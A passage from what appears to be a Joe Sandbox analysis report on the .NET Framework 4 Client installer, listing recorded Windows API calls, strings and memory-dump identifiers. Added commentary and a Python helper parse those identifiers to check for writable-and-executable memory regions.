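    """Cluster records on a Similarity field, e.g. 'API String ID' or 'Opcode ID'."""
    groups = {}
    for r in records:
        groups.setdefault(r.fields.get(key, ""), []).append(r)
    return groups
```

`callers_of` counts "Part of subcall function" entries as reachable from the record, which is what you want when hunting for the routine behind a file-deletion or event-creation chain; the `subcall_of` address is kept so the callee can be opened separately. Grouping on "API String ID" collapses the two H_prolog3 records and the two H_prolog3_catch records above into one cluster each, and a Uniqueness Score of -1.00% parses to -1.0, the value the report shows when no score was computed.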

APIs
• GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,X?f), ref: 0001930C
• GetLastError.KERNEL32 ref: 00019319
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00019354
• GetLastError.KERNEL32 ref: 0001935A
• FindFirstFileW.KERNEL32(00000000,?,\*.*,00000000,00000000), ref: 000193CC
• GetLastError.KERNEL32 ref: 000193DD
• SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000), ref: 000194C3
• GetLastError.KERNEL32 ref: 000194C9
• DeleteFileW.KERNEL32(00000000,?,00000000,00000000), ref: 000194E7
• GetLastError.KERNEL32 ref: 000194F1
• FindNextFileW.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00019516
• GetLastError.KERNEL32 ref: 00019524
• FindClose.KERNEL32(000000FF,?,00000000,00000000,X?f), ref: 00019556
• RemoveDirectoryW.KERNEL32(00000000,?,00000000,00000000,X?f), ref: 0001957A
• GetLastError.KERNEL32 ref: 00019584
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$File$AttributesFind$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                    • String ID: X?f$\*.*
                                                                                                                                                                    • API String ID: 2447602905-865809652
                                                                                                                                                                    • Opcode ID: af253c263a7297f208ab9444133ef18944d1a8226032ae4abd29f87a615b6870
                                                                                                                                                                    • Instruction ID: 4156cf44efc91ea50d583104ae5dd4f7a6574f320e64e961334be378685ab2bc
                                                                                                                                                                    • Opcode Fuzzy Hash: af253c263a7297f208ab9444133ef18944d1a8226032ae4abd29f87a615b6870
                                                                                                                                                                    • Instruction Fuzzy Hash: 7871B232C01A3A9BEB725B64CC687EDBAA1AF04760F0542B0ED15F7191E7758EC0DB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,00000000,?,?,00000000,00000000), ref: 0001A842
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001A853
                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 0001A904
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0001A954
                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0001A969
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$ErrorFirstHandleLastNext
                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                    • API String ID: 3695076719-438819550
                                                                                                                                                                    • Opcode ID: 6c2ca0630db409db24240e320cfd064c94b1700b7c305665d8f473678728a195
                                                                                                                                                                    • Instruction ID: 36e921461aad887e6d1753f05b5043eb0a6a7c143cee8d156f573729b4366e3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2ca0630db409db24240e320cfd064c94b1700b7c305665d8f473678728a195
                                                                                                                                                                    • Instruction Fuzzy Hash: 15518131E0262A9FCB31AF64CC886D9B7B4AF05324F2143E5E559A7161EB319EC5CF41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,0001B503), ref: 0001B4C2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0001B4D9
                                                                                                                                                                    • GetProcAddress.KERNEL32(DecodePointer), ref: 0001B4EB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                                                                                                                                    • API String ID: 2238633743-1525541703
                                                                                                                                                                    • Opcode ID: f609c9e27c7fef1a67992c3d0e445ee665f9eca74ba830075a6b62c269268965
                                                                                                                                                                    • Instruction ID: 8b2bdc3f831fd1f2cd344211a4460366d01705a8f4662257b35a5067cc8861d8
                                                                                                                                                                    • Opcode Fuzzy Hash: f609c9e27c7fef1a67992c3d0e445ee665f9eca74ba830075a6b62c269268965
                                                                                                                                                                    • Instruction Fuzzy Hash: E4E0B671880298EAF7429B65BC58BD53BA8A78A725F004016A608EA262C7B814C49B80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 00028FF5
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00029004
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00029010
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                    • String ID: KERNEL32.DLL$SetProcessDEPPolicy
                                                                                                                                                                    • API String ID: 3310240892-1809394400
                                                                                                                                                                    • Opcode ID: 48941e0c87ebebd7b4b5a32135a8eed12cb12a2d728f1aab685e49e38b035617
                                                                                                                                                                    • Instruction ID: cb6d543f48cecdcc7f85ed035cee5598a266c91ef9471f5a2447a3ea22f07b7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 48941e0c87ebebd7b4b5a32135a8eed12cb12a2d728f1aab685e49e38b035617
                                                                                                                                                                    • Instruction Fuzzy Hash: F4D01230B4424DAFEB595BB06C4DBD926566B4C741F404414F30ED5095DEE482D19515
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0002AE0F
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0002AE24
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00011E14), ref: 0002AE2F
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0002AE4B
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0002AE52
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                    • Opcode ID: 7d4aa318ebc9d187c9d224a5a210188db40d6566fcd04cfb40c8373edd2c1775
                                                                                                                                                                    • Instruction ID: afe31b83f5d30641070c2e42c42381622b22b0dd931af6f022c600bc4786004c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d4aa318ebc9d187c9d224a5a210188db40d6566fcd04cfb40c8373edd2c1775
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21E3B4905A08DFF756DF29FC896857BB8BB08309F50401AEB1987B60E7B85980CF12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,0000000C,00000000,00000000,?,?,?,00015D40,?,00000000,00000000), ref: 00018DE2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00015D40,?,00000000,00000000,0000000C,00000000), ref: 00018DEF
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,?,?,00015D40,?,00000000,00000000,0000000C,00000000), ref: 00018E27
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                                                    • Opcode ID: d0c8a6dee4f1f36795578c20ac3c4be215cf545718a33f2f3be95e5ab3f239f0
• Instruction ID: f8d3f92b605c3b387690cef577389b6e468d01701b928dc12ed68ea939300ebd
• Opcode Fuzzy Hash: d0c8a6dee4f1f36795578c20ac3c4be215cf545718a33f2f3be95e5ab3f239f0
• Instruction Fuzzy Hash: CF019276900118FBDF159F95DC088EEBBBAEF84710F158429F60293240DB748F91DBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00019767), ref: 000297B3
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: e2cb61a611c042e428d766eac54e440b1998aa0622b2d8ade971b301cabe0f2a
• Instruction ID: ddaab481e0e2933beb8680b48ddd61ce2790bb899e29b6ccd147a3f8f6cf624f
• Opcode Fuzzy Hash: e2cb61a611c042e428d766eac54e440b1998aa0622b2d8ade971b301cabe0f2a
• Instruction Fuzzy Hash: 499002B0E696105667041F706D0948565989B5C653F4144507701C8094DA6440805511
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 000171D4
• SendMessageA.USER32(?,00000028,00000000,00000000), ref: 000171DF
• GetDlgItem.USER32(?,000003F0), ref: 00017203
• GetLastError.KERNEL32 ref: 00017210
• GetDlgItem.USER32(?,000003F0), ref: 000172FD
• GetLastError.KERNEL32 ref: 00017307
• SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 00017341
• SetWindowLongW.USER32(?,000000EB,?), ref: 0001734D
  • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
  • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
• EndDialog.USER32(00000001,80070642), ref: 0001738C
Strings
• Failed to allocate memory for the directory control value, xrefs: 00017289
• Call to the SHGetPathFromIDListW failed, xrefs: 00017184
• Failed to get the label control, xrefs: 000170E2
• Failed to get the directory control, xrefs: 000171BA, 00017231
• Failed to get the text of the label, xrefs: 00017120
• Failed to get text from the directory control, xrefs: 000172C6
• Failed to get text length from the directory control, xrefs: 0001726D
• Failed to allocate memory for the directory value, xrefs: 00017084
• Failed to get the directory control., xrefs: 00017328
• Failed to allocate memory for the title, xrefs: 000170A3
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: MessageSend$ErrorHeapItemLast$AllocDialogLongProcessWindow
• String ID: Call to the SHGetPathFromIDListW failed$Failed to allocate memory for the directory control value$Failed to allocate memory for the directory value$Failed to allocate memory for the title$Failed to get text from the directory control$Failed to get text length from the directory control$Failed to get the directory control$Failed to get the directory control.$Failed to get the label control$Failed to get the text of the label
• API String ID: 2993860606-745645607
• Opcode ID: fad42c11825cd41ee1254ff240e059897994c9c16b0bfaf9401b0a4e92f16620
• Instruction ID: d08c9280469395d9d2953a456b6b559ca9e81735ad8b9d940b4aed2a210ad85e
• Opcode Fuzzy Hash: fad42c11825cd41ee1254ff240e059897994c9c16b0bfaf9401b0a4e92f16620
• Instruction Fuzzy Hash: 7B91B476D48226BBDB215FA4CC48BDD7AB4AF04310F168234FE19FB291D6798EC09790
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000290DE), ref: 0002A921
• __mtterm.LIBCMT ref: 0002A92D
  • Part of subcall function 0002A5DA: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000005,0002AA8F,?,000290DE), ref: 0002A5EB
  • Part of subcall function 0002A5DA: TlsFree.KERNEL32(0000000E,0002AA8F,?,000290DE), ref: 0002A605
  • Part of subcall function 0002A5DA: DeleteCriticalSection.KERNEL32(00000000,00000000,0001B4F9,?,0002AA8F,?,000290DE), ref: 0002D09B
  • Part of subcall function 0002A5DA: _free.LIBCMT ref: 0002D09E
  • Part of subcall function 0002A5DA: DeleteCriticalSection.KERNEL32(0000000E,0001B4F9,?,0002AA8F,?,000290DE), ref: 0002D0C5
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0002A943
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0002A950
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0002A95D
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0002A96A
• TlsAlloc.KERNEL32(?,000290DE), ref: 0002A9BA
• TlsSetValue.KERNEL32(00000000,?,000290DE), ref: 0002A9D5
• __init_pointers.LIBCMT ref: 0002A9DF
• _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002A9F0
• _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002A9FD
• _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002AA0A
• _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002AA17
• _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(Function_0001A772,?,000290DE), ref: 0002AA38
• __calloc_crt.LIBCMT ref: 0002AA4D
• _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,000290DE), ref: 0002AA67
• GetCurrentThreadId.KERNEL32 ref: 0002AA79
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
• String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
• API String ID: 1131704290-3819984048
• Opcode ID: bb32cd13cb8fb48dc573557fceaef0f7303f3a551494ff404dd8b4b5680bb4a7
• Instruction ID: 73e5b72bafe44223f148c89261c91def19ccf879b7e16db48245a1698669c800
• Opcode Fuzzy Hash: bb32cd13cb8fb48dc573557fceaef0f7303f3a551494ff404dd8b4b5680bb4a7
• Instruction Fuzzy Hash: F0316031A012219FF7A6AF75BC4979A3FA9EB46368701551FE718C22B0DB7C8441CF52
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCommandLineW.KERNEL32(?,00000000,X?f), ref: 00016C76
• CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00016C84
• GetLastError.KERNEL32 ref: 00016C91
• lstrlenW.KERNEL32(00000001), ref: 00016CF6
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E10,000000FF), ref: 00016D13
• lstrlenW.KERNEL32(?), ref: 00016D40
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E34,000000FF), ref: 00016D5D
• lstrlenW.KERNEL32(?), ref: 00016D90
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E64,000000FF), ref: 00016DAD
• lstrlenW.KERNEL32(?), ref: 00016DDD
• CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000001,00013E6C,000000FF), ref: 00016DF9
• LocalFree.KERNEL32(?), ref: 00016EE1
Strings
• Failed to allocate log, xrefs: 00016DD1
• Failed to get path to executable., xrefs: 00016E85
• Failed to get command line., xrefs: 00016CB2
• Failed to allocate box path, xrefs: 00016D34
• Failed to allocate extract directory, xrefs: 00016D84
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: CompareStringlstrlen$CommandLine$ArgvErrorFreeLastLocal
• String ID: Failed to allocate box path$Failed to allocate extract directory$Failed to allocate log$Failed to get command line.$Failed to get path to executable.
• API String ID: 881607980-1268566871
• Opcode ID: 4aec9cf5b051f5a71bdb6f3d7f7e60423f8df49d3a9fd0fd88ca6acaed5eb51d
• Instruction ID: 4c5ea49e08e81413a31a17766afa16e56f00fce60be8997bc504408886e88e52
• Opcode Fuzzy Hash: 4aec9cf5b051f5a71bdb6f3d7f7e60423f8df49d3a9fd0fd88ca6acaed5eb51d
• Instruction Fuzzy Hash: FC71D079E04215ABDB249F58CC86AFA76E5EB14320F218619F941EB2C0C636DDC1CB90
Uniqueness

Uniqueness Score: -1.00%

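The "Memory Dump Source" entries above all name their dump with the same dotted identifier scheme (process, address, protection, region type, module). The following is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses those identifiers, decodes the protection and type fields with the Windows PAGE_* and MEM_IMAGE constants from winnt.h, and rebuilds the layout of the mapped module so an analyst can spot a writable-and-executable region, which a clean image mapping such as the one in this report does not have. Only the address, protection and type fields are decoded against documented Windows constants; the names given to the remaining fields (process index, event, sequence, state, module index) are assumptions about Joe Sandbox's naming, and the PAGE_EXECUTE_READWRITE identifier at the end is constructed for contrast.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Windows PAGE_* memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100            # modifier bit that may be OR-ed onto a base protection
MEM_IMAGE = 0x1000000         # region type of a mapped PE image (winnt.h)
WRITABLE_EXECUTABLE = 0x40 | 0x80

# Identifier layout. Address, protection and type decode as Windows constants and
# agree with the dumps in this report; the names of the other fields are
# assumptions about Joe Sandbox's naming scheme, not documented facts.
SDMP_RE = re.compile(
    r"^(?P<process>[0-9a-f]{8})\.(?P<event>[0-9a-f]{8})\.(?P<seq>[0-9]+)\."
    r"(?P<address>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<module>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    process: int   # assumed: Joe Sandbox process index
    event: int     # assumed: dump event / stage
    seq: int       # assumed: dump sequence number
    address: int   # region base address
    protect: int   # PAGE_* protection of the region
    state: int     # assumed: region state flag
    type_: int     # region type (MEM_IMAGE for a mapped PE)
    module: int    # assumed: module index within the process

    @property
    def protection_name(self) -> str:
        base = self.protect & ~PAGE_GUARD
        name = PAGE_PROTECTION.get(base, f"UNKNOWN(0x{base:x})")
        return name + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def is_image(self) -> bool:
        return self.type_ == MEM_IMAGE

    @property
    def is_writable_executable(self) -> bool:
        # W+X pages are what to hunt for in an unpacking stub or injected stage.
        return bool(self.protect & WRITABLE_EXECUTABLE)


def parse_sdmp(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    g = m.groupdict()
    return DumpRegion(
        process=int(g["process"], 16), event=int(g["event"], 16), seq=int(g["seq"]),
        address=int(g["address"], 16), protect=int(g["protect"], 16),
        state=int(g["state"], 16), type_=int(g["type"], 16), module=int(g["module"], 16),
    )


def image_layout(names: Iterable[str]) -> list[tuple[int, str]]:
    """Sorted (address, protection) view of one module's dumped regions.

    Refuses mixed modules: the Associated entries only describe one image when
    they all carry the same process and module fields."""
    regions = [parse_sdmp(n) for n in names]
    if len({(r.process, r.module) for r in regions}) != 1:
        raise ValueError("regions belong to more than one process/module")
    return [(r.address, r.protection_name) for r in sorted(regions, key=lambda r: r.address)]


def writable_executable_regions(names: Iterable[str]) -> list[int]:
    """Base addresses of every region mapped writable and executable."""
    return [r.address for r in map(parse_sdmp, names) if r.is_writable_executable]


# The five identifiers listed under "Memory Dump Source" in this report.
REPORT_DUMPS = [
    "00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp",
    "00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp",
    "00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp",
    "00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp",
    "00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp",
]
# Constructed identifier (not from the report): a PAGE_EXECUTE_READWRITE private
# region, the shape a self-modifying or freshly unpacked stage would have.
CONSTRUCTED_RWX = "00000002.00000002.4193999999.0000000000400000.00000040.00000001.00020000.0000000B.sdmp"

if __name__ == "__main__":
    for addr, prot in image_layout(REPORT_DUMPS):
        print(f"0x{addr:08x}  {prot}")
    print("W+X regions in report:", writable_executable_regions(REPORT_DUMPS))
    print("W+X regions in constructed sample:",
          [hex(a) for a in writable_executable_regions([CONSTRUCTED_RWX])])
```

Run against the report's identifiers the layout comes out as a plain PE mapping: read-only header at 0x10000, execute-read code at 0x11000 (the "Source File" of every entry above), read-write data at 0x3A000 and 0x3D000, read-only resources at 0x3E000, and no region that is both writable and executable. The constructed 0x40 region is the one the check flags.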
APIs
  • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
  • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
• GetProcessHeap.KERNEL32(00000000,?,?,01000191,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD,00000000), ref: 00018016
• HeapFree.KERNEL32(00000000,?,?,?,?,00017DDD,00000000,00000000,?,?,?,00017780,?,00000000,00000000,X?f), ref: 00018019
• GetProcessHeap.KERNEL32(00000000,00000000,?,01000191,?,0100002D,?,00000000,00000000,00000000), ref: 0001802F
• HeapFree.KERNEL32(00000000), ref: 00018032
Strings
• Ignoring cluster resource as it's not a Physical Disk, xrefs: 00017F5D
• Cluster resource type: '%S', xrefs: 00017F3E
                                                                                                                                                                    • Found a partition on cluster resource: '%S', xrefs: 00017FA7
                                                                                                                                                                    • Failed to allocate an empty drive map, xrefs: 00017F0A
                                                                                                                                                                    • Physical Disk, xrefs: 00017F49
                                                                                                                                                                    • Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO, xrefs: 00017F87
                                                                                                                                                                    • Ignoring the partition '%S' because it doesn't look like a DOS name, xrefs: 00017FBD
